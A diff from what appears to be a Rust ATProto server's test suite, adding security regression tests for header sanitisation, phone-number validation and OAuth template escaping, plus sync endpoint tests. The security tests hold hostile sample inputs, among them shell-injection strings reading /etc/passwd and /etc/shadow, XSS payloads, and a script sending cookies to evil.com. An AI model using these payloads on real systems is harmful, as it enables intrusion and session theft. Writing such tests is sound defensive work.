state::AppState,
7
-
sync::{firehose::SequencedEvent, relay_client::start_relay_clients},
8
-
};
9
-
use chrono::Utc;
10
-
use tokio::net::TcpListener;
11
-
use tokio::sync::mpsc;
12
-
13
-
async fn mock_relay_server(
14
-
listener: TcpListener,
15
-
event_tx: mpsc::Sender<Vec<u8>>,
16
-
connected_tx: mpsc::Sender<()>,
17
-
) {
18
-
let handler = |ws: axum::extract::ws::WebSocketUpgrade| async {
19
-
ws.on_upgrade(move |mut socket| async move {
20
-
let _ = connected_tx.send(()).await;
21
-
while let Some(Ok(msg)) = socket.recv().await {
22
-
if let Message::Binary(bytes) = msg {
23
-
let _ = event_tx.send(bytes.to_vec()).await;
24
-
break;
25
-
}
26
-
}
27
-
})
28
-
};
29
-
let app = Router::new().route("/", get(handler));
30
-
31
-
axum::serve(listener, app.into_make_service())
32
-
.await
33
-
.unwrap();
34
-
}
35
-
36
-
#[tokio::test]
37
-
async fn test_outbound_relay_client() {
38
-
let listener = TcpListener::bind("127.0.0.1:0").await.unwrap();
39
-
let addr = listener.local_addr().unwrap();
40
-
let (event_tx, mut event_rx) = mpsc::channel(1);
41
-
let (connected_tx, _connected_rx) = mpsc::channel::<()>(1);
42
-
tokio::spawn(mock_relay_server(listener, event_tx, connected_tx));
43
-
let relay_url = format!("ws://{}", addr);
44
-
45
-
let db_url = get_db_connection_string().await;
46
-
let pool = sqlx::postgres::PgPoolOptions::new()
47
-
.connect(&db_url)
48
-
.await
49
-
.unwrap();
50
-
let state = AppState::new(pool).await;
51
-
52
-
let (ready_tx, ready_rx) = mpsc::channel(1);
53
-
start_relay_clients(state.clone(), vec![relay_url], Some(ready_rx)).await;
54
-
55
-
tokio::time::timeout(
56
-
tokio::time::Duration::from_secs(5),
57
-
async {
58
-
ready_tx.closed().await;
59
-
}
60
-
)
61
-
.await
62
-
.expect("Timeout waiting for relay client to be ready");
63
-
64
-
let dummy_event = SequencedEvent {
65
-
seq: 1,
66
-
did: "did:plc:test".to_string(),
67
-
created_at: Utc::now(),
68
-
event_type: "commit".to_string(),
69
-
commit_cid: Some("bafyreihffx5a4o3qbv7vp6qmxpxok5mx5xvlsq6z4x3xv3zqv7vqvc7mzy".to_string()),
70
-
prev_cid: None,
71
-
ops: Some(serde_json::json!([])),
72
-
blobs: Some(vec![]),
73
-
blocks_cids: Some(vec![]),
74
-
};
75
-
state.firehose_tx.send(dummy_event).unwrap();
76
-
77
-
let received_bytes = tokio::time::timeout(
78
-
tokio::time::Duration::from_secs(5),
79
-
event_rx.recv()
80
-
)
81
-
.await
82
-
.expect("Timeout waiting for event")
83
-
.expect("Event channel closed");
84
-
85
-
assert!(!received_bytes.is_empty());
86
-
}
···
+377
tests/security_fixes.rs
+377
tests/security_fixes.rs
···
···
1
+
mod common;
2
+
3
+
use bspds::notifications::{
4
+
SendError, is_valid_phone_number, sanitize_header_value,
5
+
};
6
+
use bspds::oauth::templates::{login_page, error_page, success_page};
7
+
use bspds::image::{ImageProcessor, ImageError};
8
+
9
+
#[test]
10
+
fn test_sanitize_header_value_removes_crlf() {
11
+
let malicious = "Injected\r\nBcc: attacker@evil.com";
12
+
let sanitized = sanitize_header_value(malicious);
13
+
14
+
assert!(!sanitized.contains('\r'), "CR should be removed");
15
+
assert!(!sanitized.contains('\n'), "LF should be removed");
16
+
assert!(sanitized.contains("Injected"), "Original content should be preserved");
17
+
assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)");
18
+
}
19
+
20
+
#[test]
21
+
fn test_sanitize_header_value_preserves_content() {
22
+
let normal = "Normal Subject Line";
23
+
let sanitized = sanitize_header_value(normal);
24
+
25
+
assert_eq!(sanitized, "Normal Subject Line");
26
+
}
27
+
28
+
#[test]
29
+
fn test_sanitize_header_value_trims_whitespace() {
30
+
let padded = " Subject ";
31
+
let sanitized = sanitize_header_value(padded);
32
+
33
+
assert_eq!(sanitized, "Subject");
34
+
}
35
+
36
+
#[test]
37
+
fn test_sanitize_header_value_handles_multiple_newlines() {
38
+
let input = "Line1\r\nLine2\nLine3\rLine4";
39
+
let sanitized = sanitize_header_value(input);
40
+
41
+
assert!(!sanitized.contains('\r'), "CR should be removed");
42
+
assert!(!sanitized.contains('\n'), "LF should be removed");
43
+
assert!(sanitized.contains("Line1"), "Content before newlines preserved");
44
+
assert!(sanitized.contains("Line4"), "Content after newlines preserved");
45
+
}
46
+
47
+
#[test]
48
+
fn test_email_header_injection_sanitization() {
49
+
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
50
+
let sanitized = sanitize_header_value(header_injection);
51
+
52
+
let lines: Vec<&str> = sanitized.split("\r\n").collect();
53
+
assert_eq!(lines.len(), 1, "Should be a single line after sanitization");
54
+
assert!(sanitized.contains("Normal Subject"), "Original content preserved");
55
+
assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text");
56
+
assert!(sanitized.contains("X-Injected:"), "All content on same line");
57
+
}
58
+
59
+
#[test]
60
+
fn test_valid_phone_number_accepts_correct_format() {
61
+
assert!(is_valid_phone_number("+1234567890"));
62
+
assert!(is_valid_phone_number("+12025551234"));
63
+
assert!(is_valid_phone_number("+442071234567"));
64
+
assert!(is_valid_phone_number("+4915123456789"));
65
+
assert!(is_valid_phone_number("+1"));
66
+
}
67
+
68
+
#[test]
69
+
fn test_valid_phone_number_rejects_missing_plus() {
70
+
assert!(!is_valid_phone_number("1234567890"));
71
+
assert!(!is_valid_phone_number("12025551234"));
72
+
}
73
+
74
+
#[test]
75
+
fn test_valid_phone_number_rejects_empty() {
76
+
assert!(!is_valid_phone_number(""));
77
+
}
78
+
79
+
#[test]
80
+
fn test_valid_phone_number_rejects_just_plus() {
81
+
assert!(!is_valid_phone_number("+"));
82
+
}
83
+
84
+
#[test]
85
+
fn test_valid_phone_number_rejects_too_long() {
86
+
assert!(!is_valid_phone_number("+12345678901234567890123"));
87
+
}
88
+
89
+
#[test]
90
+
fn test_valid_phone_number_rejects_letters() {
91
+
assert!(!is_valid_phone_number("+abc123"));
92
+
assert!(!is_valid_phone_number("+1234abc"));
93
+
assert!(!is_valid_phone_number("+a"));
94
+
}
95
+
96
+
#[test]
97
+
fn test_valid_phone_number_rejects_spaces() {
98
+
assert!(!is_valid_phone_number("+1234 5678"));
99
+
assert!(!is_valid_phone_number("+ 1234567890"));
100
+
assert!(!is_valid_phone_number("+1 "));
101
+
}
102
+
103
+
#[test]
104
+
fn test_valid_phone_number_rejects_special_chars() {
105
+
assert!(!is_valid_phone_number("+123-456-7890"));
106
+
assert!(!is_valid_phone_number("+1(234)567890"));
107
+
assert!(!is_valid_phone_number("+1.234.567.890"));
108
+
}
109
+
110
+
#[test]
111
+
fn test_signal_recipient_command_injection_blocked() {
112
+
let malicious_inputs = vec![
113
+
"+123; rm -rf /",
114
+
"+123 && cat /etc/passwd",
115
+
"+123`id`",
116
+
"+123$(whoami)",
117
+
"+123|cat /etc/shadow",
118
+
"+123\n--help",
119
+
"+123\r\n--version",
120
+
"+123--help",
121
+
];
122
+
123
+
for input in malicious_inputs {
124
+
assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input);
125
+
}
126
+
}
127
+
128
+
#[test]
129
+
fn test_image_file_size_limit_enforced() {
130
+
let processor = ImageProcessor::new();
131
+
132
+
let oversized_data: Vec<u8> = vec![0u8; 11 * 1024 * 1024];
133
+
134
+
let result = processor.process(&oversized_data, "image/jpeg");
135
+
136
+
match result {
137
+
Err(ImageError::FileTooLarge { .. }) => {}
138
+
Err(other) => {
139
+
let msg = format!("{:?}", other);
140
+
if !msg.to_lowercase().contains("size") && !msg.to_lowercase().contains("large") {
141
+
panic!("Expected FileTooLarge error, got: {:?}", other);
142
+
}
143
+
}
144
+
Ok(_) => panic!("Should reject files over size limit"),
145
+
}
146
+
}
147
+
148
+
#[test]
149
+
fn test_image_file_size_limit_configurable() {
150
+
let processor = ImageProcessor::new().with_max_file_size(1024);
151
+
152
+
let data: Vec<u8> = vec![0u8; 2048];
153
+
154
+
let result = processor.process(&data, "image/jpeg");
155
+
156
+
assert!(result.is_err(), "Should reject files over configured limit");
157
+
}
158
+
159
+
#[test]
160
+
fn test_oauth_template_xss_escaping_client_id() {
161
+
let malicious_client_id = "<script>alert('xss')</script>";
162
+
let html = login_page(malicious_client_id, None, None, "test-uri", None, None);
163
+
164
+
assert!(!html.contains("<script>"), "Script tags should be escaped");
165
+
assert!(html.contains("<script>"), "HTML entities should be used for escaping");
166
+
}
167
+
168
+
#[test]
169
+
fn test_oauth_template_xss_escaping_client_name() {
170
+
let malicious_client_name = "<img src=x onerror=alert('xss')>";
171
+
let html = login_page("client123", Some(malicious_client_name), None, "test-uri", None, None);
172
+
173
+
assert!(!html.contains("<img "), "IMG tags should be escaped");
174
+
assert!(html.contains("<img"), "IMG tag should be escaped as HTML entity");
175
+
}
176
+
177
+
#[test]
178
+
fn test_oauth_template_xss_escaping_scope() {
179
+
let malicious_scope = "\"><script>alert('xss')</script>";
180
+
let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None);
181
+
182
+
assert!(!html.contains("<script>"), "Script tags in scope should be escaped");
183
+
}
184
+
185
+
#[test]
186
+
fn test_oauth_template_xss_escaping_error_message() {
187
+
let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>";
188
+
let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None);
189
+
190
+
assert!(!html.contains("<script>"), "Script tags in error should be escaped");
191
+
}
192
+
193
+
#[test]
194
+
fn test_oauth_template_xss_escaping_login_hint() {
195
+
let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\"";
196
+
let html = login_page("client123", None, None, "test-uri", None, Some(malicious_hint));
197
+
198
+
assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint");
199
+
assert!(html.contains("""), "Quotes should be escaped");
200
+
}
201
+
202
+
#[test]
203
+
fn test_oauth_template_xss_escaping_request_uri() {
204
+
let malicious_uri = "\" onmouseover=\"alert('xss')\"";
205
+
let html = login_page("client123", None, None, malicious_uri, None, None);
206
+
207
+
assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri");
208
+
}
209
+
210
+
#[test]
211
+
fn test_oauth_error_page_xss_escaping() {
212
+
let malicious_error = "<script>steal()</script>";
213
+
let malicious_desc = "<img src=x onerror=evil()>";
214
+
215
+
let html = error_page(malicious_error, Some(malicious_desc));
216
+
217
+
assert!(!html.contains("<script>"), "Script tags should be escaped in error page");
218
+
assert!(!html.contains("<img "), "IMG tags should be escaped in error page");
219
+
}
220
+
221
+
#[test]
222
+
fn test_oauth_success_page_xss_escaping() {
223
+
let malicious_name = "<script>steal_session()</script>";
224
+
225
+
let html = success_page(Some(malicious_name));
226
+
227
+
assert!(!html.contains("<script>"), "Script tags should be escaped in success page");
228
+
}
229
+
230
+
#[test]
231
+
fn test_oauth_template_no_javascript_urls() {
232
+
let html = login_page("client123", None, None, "test-uri", None, None);
233
+
assert!(!html.contains("javascript:"), "Login page should not contain javascript: URLs");
234
+
235
+
let error_html = error_page("test_error", None);
236
+
assert!(!error_html.contains("javascript:"), "Error page should not contain javascript: URLs");
237
+
238
+
let success_html = success_page(None);
239
+
assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs");
240
+
}
241
+
242
+
#[test]
243
+
fn test_oauth_template_form_action_safe() {
244
+
let malicious_uri = "javascript:alert('xss')//";
245
+
let html = login_page("client123", None, None, malicious_uri, None, None);
246
+
247
+
assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL");
248
+
}
249
+
250
+
#[test]
251
+
fn test_send_error_types_have_display() {
252
+
let timeout = SendError::Timeout;
253
+
let max_retries = SendError::MaxRetriesExceeded("test".to_string());
254
+
let invalid_recipient = SendError::InvalidRecipient("bad recipient".to_string());
255
+
256
+
assert!(!format!("{}", timeout).is_empty());
257
+
assert!(!format!("{}", max_retries).is_empty());
258
+
assert!(!format!("{}", invalid_recipient).is_empty());
259
+
}
260
+
261
+
#[test]
262
+
fn test_send_error_timeout_message() {
263
+
let error = SendError::Timeout;
264
+
let msg = format!("{}", error);
265
+
assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout");
266
+
}
267
+
268
+
#[test]
269
+
fn test_send_error_max_retries_includes_detail() {
270
+
let error = SendError::MaxRetriesExceeded("Server returned 503".to_string());
271
+
let msg = format!("{}", error);
272
+
assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context");
273
+
}
274
+
275
+
#[tokio::test]
276
+
async fn test_check_signup_queue_accepts_session_jwt() {
277
+
use common::{base_url, client, create_account_and_login};
278
+
279
+
let base = base_url().await;
280
+
let http_client = client();
281
+
282
+
let (token, _did) = create_account_and_login(&http_client).await;
283
+
284
+
let res = http_client
285
+
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
286
+
.header("Authorization", format!("Bearer {}", token))
287
+
.send()
288
+
.await
289
+
.unwrap();
290
+
291
+
assert_eq!(res.status(), reqwest::StatusCode::OK, "Session JWTs should be accepted");
292
+
293
+
let body: serde_json::Value = res.json().await.unwrap();
294
+
assert_eq!(body["activated"], true);
295
+
}
296
+
297
+
#[tokio::test]
298
+
async fn test_check_signup_queue_no_auth() {
299
+
use common::{base_url, client};
300
+
301
+
let base = base_url().await;
302
+
let http_client = client();
303
+
304
+
let res = http_client
305
+
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
306
+
.send()
307
+
.await
308
+
.unwrap();
309
+
310
+
assert_eq!(res.status(), reqwest::StatusCode::OK, "No auth should work");
311
+
312
+
let body: serde_json::Value = res.json().await.unwrap();
313
+
assert_eq!(body["activated"], true);
314
+
}
315
+
316
+
#[test]
317
+
fn test_html_escape_ampersand() {
318
+
let html = login_page("client&test", None, None, "test-uri", None, None);
319
+
assert!(html.contains("&"), "Ampersand should be escaped");
320
+
assert!(!html.contains("client&test"), "Raw ampersand should not appear in output");
321
+
}
322
+
323
+
#[test]
324
+
fn test_html_escape_quotes() {
325
+
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
326
+
assert!(html.contains(""") || html.contains("""), "Double quotes should be escaped");
327
+
assert!(html.contains("'") || html.contains("'"), "Single quotes should be escaped");
328
+
}
329
+
330
+
#[test]
331
+
fn test_html_escape_angle_brackets() {
332
+
let html = login_page("client<test>more", None, None, "test-uri", None, None);
333
+
assert!(html.contains("<"), "Less than should be escaped");
334
+
assert!(html.contains(">"), "Greater than should be escaped");
335
+
assert!(!html.contains("<test>"), "Raw angle brackets should not appear");
336
+
}
337
+
338
+
#[test]
339
+
fn test_oauth_template_preserves_safe_content() {
340
+
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com"));
341
+
342
+
assert!(html.contains("my-safe-client") || html.contains("My Safe App"), "Safe content should be preserved");
343
+
assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved");
344
+
assert!(html.contains("user@example.com"), "Login hint should be preserved");
345
+
}
346
+
347
+
#[test]
348
+
fn test_csrf_like_input_value_protection() {
349
+
let malicious = "\" onclick=\"alert('csrf')";
350
+
let html = login_page("client", None, None, malicious, None, None);
351
+
352
+
assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable");
353
+
}
354
+
355
+
#[test]
356
+
fn test_unicode_handling_in_templates() {
357
+
let unicode_client = "客户端 クライアント";
358
+
let html = login_page(unicode_client, None, None, "test-uri", None, None);
359
+
360
+
assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded");
361
+
}
362
+
363
+
#[test]
364
+
fn test_null_byte_in_input() {
365
+
let with_null = "client\0id";
366
+
let sanitized = sanitize_header_value(with_null);
367
+
368
+
assert!(sanitized.contains("client"), "Content before null should be preserved");
369
+
}
370
+
371
+
#[test]
372
+
fn test_very_long_input_handling() {
373
+
let long_input = "x".repeat(10000);
374
+
let sanitized = sanitize_header_value(&long_input);
375
+
376
+
assert!(!sanitized.is_empty(), "Long input should still produce output");
377
+
}
+307
tests/sync_deprecated.rs
+307
tests/sync_deprecated.rs
···
···
1
+
mod common;
2
+
mod helpers;
3
+
use common::*;
4
+
use helpers::*;
5
+
6
+
use reqwest::StatusCode;
7
+
use serde_json::Value;
8
+
9
+
#[tokio::test]
10
+
async fn test_get_head_success() {
11
+
let client = client();
12
+
let (did, _jwt) = setup_new_user("gethead-success").await;
13
+
14
+
let res = client
15
+
.get(format!(
16
+
"{}/xrpc/com.atproto.sync.getHead",
17
+
base_url().await
18
+
))
19
+
.query(&[("did", did.as_str())])
20
+
.send()
21
+
.await
22
+
.expect("Failed to send request");
23
+
24
+
assert_eq!(res.status(), StatusCode::OK);
25
+
let body: Value = res.json().await.expect("Response was not valid JSON");
26
+
assert!(body["root"].is_string());
27
+
let root = body["root"].as_str().unwrap();
28
+
assert!(root.starts_with("bafy"), "Root CID should be a CID");
29
+
}
30
+
31
+
#[tokio::test]
32
+
async fn test_get_head_not_found() {
33
+
let client = client();
34
+
let res = client
35
+
.get(format!(
36
+
"{}/xrpc/com.atproto.sync.getHead",
37
+
base_url().await
38
+
))
39
+
.query(&[("did", "did:plc:nonexistent12345")])
40
+
.send()
41
+
.await
42
+
.expect("Failed to send request");
43
+
44
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
45
+
let body: Value = res.json().await.expect("Response was not valid JSON");
46
+
assert_eq!(body["error"], "HeadNotFound");
47
+
assert!(body["message"].as_str().unwrap().contains("Could not find root"));
48
+
}
49
+
50
+
#[tokio::test]
51
+
async fn test_get_head_missing_param() {
52
+
let client = client();
53
+
let res = client
54
+
.get(format!(
55
+
"{}/xrpc/com.atproto.sync.getHead",
56
+
base_url().await
57
+
))
58
+
.send()
59
+
.await
60
+
.expect("Failed to send request");
61
+
62
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
63
+
}
64
+
65
+
#[tokio::test]
66
+
async fn test_get_head_empty_did() {
67
+
let client = client();
68
+
let res = client
69
+
.get(format!(
70
+
"{}/xrpc/com.atproto.sync.getHead",
71
+
base_url().await
72
+
))
73
+
.query(&[("did", "")])
74
+
.send()
75
+
.await
76
+
.expect("Failed to send request");
77
+
78
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
79
+
let body: Value = res.json().await.expect("Response was not valid JSON");
80
+
assert_eq!(body["error"], "InvalidRequest");
81
+
}
82
+
83
+
#[tokio::test]
84
+
async fn test_get_head_whitespace_did() {
85
+
let client = client();
86
+
let res = client
87
+
.get(format!(
88
+
"{}/xrpc/com.atproto.sync.getHead",
89
+
base_url().await
90
+
))
91
+
.query(&[("did", " ")])
92
+
.send()
93
+
.await
94
+
.expect("Failed to send request");
95
+
96
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
97
+
}
98
+
99
+
#[tokio::test]
100
+
async fn test_get_head_changes_after_record_create() {
101
+
let client = client();
102
+
let (did, jwt) = setup_new_user("gethead-changes").await;
103
+
104
+
let res1 = client
105
+
.get(format!(
106
+
"{}/xrpc/com.atproto.sync.getHead",
107
+
base_url().await
108
+
))
109
+
.query(&[("did", did.as_str())])
110
+
.send()
111
+
.await
112
+
.expect("Failed to get initial head");
113
+
let body1: Value = res1.json().await.unwrap();
114
+
let head1 = body1["root"].as_str().unwrap().to_string();
115
+
116
+
create_post(&client, &did, &jwt, "Post to change head").await;
117
+
118
+
let res2 = client
119
+
.get(format!(
120
+
"{}/xrpc/com.atproto.sync.getHead",
121
+
base_url().await
122
+
))
123
+
.query(&[("did", did.as_str())])
124
+
.send()
125
+
.await
126
+
.expect("Failed to get head after record");
127
+
let body2: Value = res2.json().await.unwrap();
128
+
let head2 = body2["root"].as_str().unwrap().to_string();
129
+
130
+
assert_ne!(head1, head2, "Head CID should change after record creation");
131
+
}
132
+
133
+
#[tokio::test]
134
+
async fn test_get_checkout_success() {
135
+
let client = client();
136
+
let (did, jwt) = setup_new_user("getcheckout-success").await;
137
+
138
+
create_post(&client, &did, &jwt, "Post for checkout test").await;
139
+
140
+
let res = client
141
+
.get(format!(
142
+
"{}/xrpc/com.atproto.sync.getCheckout",
143
+
base_url().await
144
+
))
145
+
.query(&[("did", did.as_str())])
146
+
.send()
147
+
.await
148
+
.expect("Failed to send request");
149
+
150
+
assert_eq!(res.status(), StatusCode::OK);
151
+
assert_eq!(
152
+
res.headers()
153
+
.get("content-type")
154
+
.and_then(|h| h.to_str().ok()),
155
+
Some("application/vnd.ipld.car")
156
+
);
157
+
let body = res.bytes().await.expect("Failed to get body");
158
+
assert!(!body.is_empty(), "CAR file should not be empty");
159
+
assert!(body.len() > 50, "CAR file should contain actual data");
160
+
}
161
+
162
+
#[tokio::test]
163
+
async fn test_get_checkout_not_found() {
164
+
let client = client();
165
+
let res = client
166
+
.get(format!(
167
+
"{}/xrpc/com.atproto.sync.getCheckout",
168
+
base_url().await
169
+
))
170
+
.query(&[("did", "did:plc:nonexistent12345")])
171
+
.send()
172
+
.await
173
+
.expect("Failed to send request");
174
+
175
+
assert_eq!(res.status(), StatusCode::NOT_FOUND);
176
+
let body: Value = res.json().await.expect("Response was not valid JSON");
177
+
assert_eq!(body["error"], "RepoNotFound");
178
+
}
179
+
180
+
#[tokio::test]
181
+
async fn test_get_checkout_missing_param() {
182
+
let client = client();
183
+
let res = client
184
+
.get(format!(
185
+
"{}/xrpc/com.atproto.sync.getCheckout",
186
+
base_url().await
187
+
))
188
+
.send()
189
+
.await
190
+
.expect("Failed to send request");
191
+
192
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
193
+
}
194
+
195
+
#[tokio::test]
196
+
async fn test_get_checkout_empty_did() {
197
+
let client = client();
198
+
let res = client
199
+
.get(format!(
200
+
"{}/xrpc/com.atproto.sync.getCheckout",
201
+
base_url().await
202
+
))
203
+
.query(&[("did", "")])
204
+
.send()
205
+
.await
206
+
.expect("Failed to send request");
207
+
208
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
209
+
}
210
+
211
+
#[tokio::test]
212
+
async fn test_get_checkout_empty_repo() {
213
+
let client = client();
214
+
let (did, _jwt) = setup_new_user("getcheckout-empty").await;
215
+
216
+
let res = client
217
+
.get(format!(
218
+
"{}/xrpc/com.atproto.sync.getCheckout",
219
+
base_url().await
220
+
))
221
+
.query(&[("did", did.as_str())])
222
+
.send()
223
+
.await
224
+
.expect("Failed to send request");
225
+
226
+
assert_eq!(res.status(), StatusCode::OK);
227
+
let body = res.bytes().await.expect("Failed to get body");
228
+
assert!(!body.is_empty(), "Even empty repo should return CAR header");
229
+
}
230
+
231
+
#[tokio::test]
232
+
async fn test_get_checkout_includes_multiple_records() {
233
+
let client = client();
234
+
let (did, jwt) = setup_new_user("getcheckout-multi").await;
235
+
236
+
for i in 0..5 {
237
+
tokio::time::sleep(std::time::Duration::from_millis(50)).await;
238
+
create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await;
239
+
}
240
+
241
+
let res = client
242
+
.get(format!(
243
+
"{}/xrpc/com.atproto.sync.getCheckout",
244
+
base_url().await
245
+
))
246
+
.query(&[("did", did.as_str())])
247
+
.send()
248
+
.await
249
+
.expect("Failed to send request");
250
+
251
+
assert_eq!(res.status(), StatusCode::OK);
252
+
let body = res.bytes().await.expect("Failed to get body");
253
+
assert!(body.len() > 500, "CAR file with 5 records should be larger");
254
+
}
255
+
256
+
#[tokio::test]
257
+
async fn test_get_head_matches_latest_commit() {
258
+
let client = client();
259
+
let (did, _jwt) = setup_new_user("gethead-matches-latest").await;
260
+
261
+
let head_res = client
262
+
.get(format!(
263
+
"{}/xrpc/com.atproto.sync.getHead",
264
+
base_url().await
265
+
))
266
+
.query(&[("did", did.as_str())])
267
+
.send()
268
+
.await
269
+
.expect("Failed to get head");
270
+
let head_body: Value = head_res.json().await.unwrap();
271
+
let head_root = head_body["root"].as_str().unwrap();
272
+
273
+
let latest_res = client
274
+
.get(format!(
275
+
"{}/xrpc/com.atproto.sync.getLatestCommit",
276
+
base_url().await
277
+
))
278
+
.query(&[("did", did.as_str())])
279
+
.send()
280
+
.await
281
+
.expect("Failed to get latest commit");
282
+
let latest_body: Value = latest_res.json().await.unwrap();
283
+
let latest_cid = latest_body["cid"].as_str().unwrap();
284
+
285
+
assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid");
286
+
}
287
+
288
+
#[tokio::test]
289
+
async fn test_get_checkout_car_header_valid() {
290
+
let client = client();
291
+
let (did, _jwt) = setup_new_user("getcheckout-header").await;
292
+
293
+
let res = client
294
+
.get(format!(
295
+
"{}/xrpc/com.atproto.sync.getCheckout",
296
+
base_url().await
297
+
))
298
+
.query(&[("did", did.as_str())])
299
+
.send()
300
+
.await
301
+
.expect("Failed to send request");
302
+
303
+
assert_eq!(res.status(), StatusCode::OK);
304
+
let body = res.bytes().await.expect("Failed to get body");
305
+
306
+
assert!(body.len() >= 2, "CAR file should have at least header length");
307
+
}